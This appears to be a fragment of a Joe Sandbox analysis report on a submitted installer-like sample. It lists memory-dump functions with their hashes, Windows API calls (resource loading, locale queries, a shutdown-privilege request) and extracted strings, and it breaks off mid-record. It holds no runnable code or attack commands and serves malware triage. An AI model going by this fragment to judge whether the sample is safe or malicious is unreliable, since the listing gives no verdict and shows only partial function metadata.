                                                                                            • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                            • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                            • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                            • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                            • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                            • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                            • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                            • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: SystemTime
                                                                                            • String ID:
                                                                                            • API String ID: 2656138-0
                                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                            APIs
                                                                                            • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                            • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                            • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                            • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                            • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                            • API String ID: 4190037839-2401316094
                                                                                            • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                            • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                              • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                            • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                            • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                            • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                            • LocalFree.KERNEL32(0053AFF8,00000000,00401AB4), ref: 00401A1B
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0053AFF8,00000000,00401AB4), ref: 00401A3A
                                                                                            • LocalFree.KERNEL32(0053BFF8,?,00000000,00008000,0053AFF8,00000000,00401AB4), ref: 00401A79
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                            • API String ID: 1220098344-1503883590
                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                            • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                            • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: U1hd.@$`&R
                                                                                            • API String ID: 2123368496-3738744790
                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: )q@
                                                                                            • API String ID: 3660427363-2284170586
                                                                                            • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                            • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                            Strings
                                                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                            • Setup, xrefs: 00409CAD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                            • API String ID: 2030045667-3271211647
                                                                                            • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
